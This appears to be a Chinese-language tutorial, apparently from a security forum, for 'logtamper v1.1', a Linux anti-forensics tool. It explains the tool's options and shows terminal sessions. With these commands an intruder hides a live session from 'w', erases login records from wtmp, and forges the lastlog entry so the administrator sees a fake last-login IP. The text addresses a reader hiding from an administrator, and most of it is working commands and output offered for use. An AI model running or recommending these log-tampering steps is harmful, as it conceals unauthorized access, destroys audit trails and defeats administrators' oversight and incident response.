Linux下日志清除 logtamper version1.1

logtamper version1.1 logtamper是一款*修改*linux日志的工具，在修改日志文件的同時，能夠保留被修改文件的時間信息(atime沒改，覺得沒必要)。
[root@localhost logtamper]# ./logtamper-static Logtamper v 1.1 for linux
logtamper [-f utmp_filename] -h username hostname hide username connected from hostname logtamper [-f wtmp_filename] -w username hostname erase username from hostname in wtmp file logtamper [-f lastlog_filename] -m username hostname ttyname YYYY[:MM[:DD[:hh[:mm[:ss]]]]] modify lastlog info
-f 選項：用於指定要修改的文件的路徑的，是個可選項。由於不同系統的日志存放路徑不一樣，可以手工指定。 默認的日志存放地點是： #define UTMPFILE "/var/run/utmp" #define WTMPFILE "/var/log/wtmp" #define LASTLOGFILE "/var/log/lastlog"
-h 選項: 有時候你和管理員同時在線，管理員w一下就能看到你了。使用-h選項用戶躲避管理員w查看，如下：
[root@localhost logtamper]# w 21:27:25 up 5 days, 13:48, 4 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - Fri14 18:24m 0.33s 0.33s -bash root pts/3 192.168.80.1 21:21 6:22 0.04s 0.04s -bash root pts/2 192.168.80.1 21:06 0.00s 0.13s 0.00s w root pts/4 192.168.80.1 21:21 5:52 0.03s 0.03s -bash
我們是從192.168.80.1機器連上來的，現在隱藏下：
[root@localhost logtamper]# ./logtamper-static -h root 192.168.80.1 Logtamper v 1.1 for linux Copyright (C) 2008 by xi4oyu <[email protected] >
Seems you're invisible Now...Check it out!
[root@localhost logtamper]# w 21:27:46 up 5 days, 13:48, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 - Fri14 18:24m 0.33s 0.33s -bash [root@localhost logtamper]#
-w 選項:用於清除你的登錄日志，現在上的linux日志清除工具做的很粗燥啊，這個可以指定清除某些hostname過來的機器。
[root@localhost logtamper]# last root tty1 Wed Oct 1 21:30 - 21:30 (00:00) root pts/4 192.168.80.1 Wed Oct 1 21:21 still logged in root pts/3 192.168.80.1 Wed Oct 1 21:21 still logged in
wtmp begins Wed Oct 1 06:01:46 2008
清除192.168.80.1的登錄日志：
[root@localhost logtamper]# ./logtamper-static -w root 192.168.80.1 Logtamper v 1.1 for linux Copyright (C) 2008 by xi4oyu <[email protected] >
Aho,you are now invisible to last...Check it out! [root@localhost logtamper]# last root tty1 Wed Oct 1 21:30 - 21:30 (00:00)
wtmp begins Wed Oct 1 06:01:46 2008 [root@localhost logtamper]#
-m 選項:用於修改上次登錄地點，我們使用ssh登錄的時候可能會注意到這點 login as: root Sent username "root" [email protected] 's password:
Last login: Wed Oct 1 21:31:40 2008 from 192.168.80.45 [root@localhost ~]#
如果不修改lastlog的話，管理員下次登錄就會提示從我們的機器IP登錄。使用-m選項可以編輯這個選項：
[root@localhost logtamper]# ./logtamper-static -m root 1.2.3.4 tty10 2008:1:1:1:1:1 Logtamper v 1.1 for linux Copyright (C) 2008 by xi4oyu <[email protected] >
Aho, now you never come here before...Check it out! [root@localhost logtamper]#